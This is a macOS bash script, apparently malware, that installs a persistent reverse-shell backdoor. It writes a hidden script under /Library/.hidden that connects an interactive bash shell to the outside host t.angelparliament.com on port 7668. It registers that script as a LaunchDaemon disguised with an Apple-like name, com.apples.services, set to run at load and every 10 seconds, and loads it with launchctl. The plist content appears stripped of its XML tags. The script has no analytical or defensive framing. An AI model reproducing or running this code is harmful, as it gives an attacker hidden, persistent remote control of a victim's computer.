#!/bin/bash
mkdir -p /Library/.hidden
echo "#!/bin/bash
bash -i >& /dev/tcp/t.angelparliament.com/7668 0>&1
wait" > /Library/.hidden/connect.sh
chmod +x /Library/.hidden/connect.sh
mkdir -p /Library/LaunchDaemons
echo 'Label
com.apples.services
ProgramArguments
/bin/sh
/Library/.hidden/connect.sh
RunAtLoad
StartInterval
10
AbandonProcessGroup' > /Library/LaunchDaemons/com.apples.services.plist
chmod 600 /Library/LaunchDaemons/com.apples.services.plist
launchctl load /Library/LaunchDaemons/com.apples.services.plist
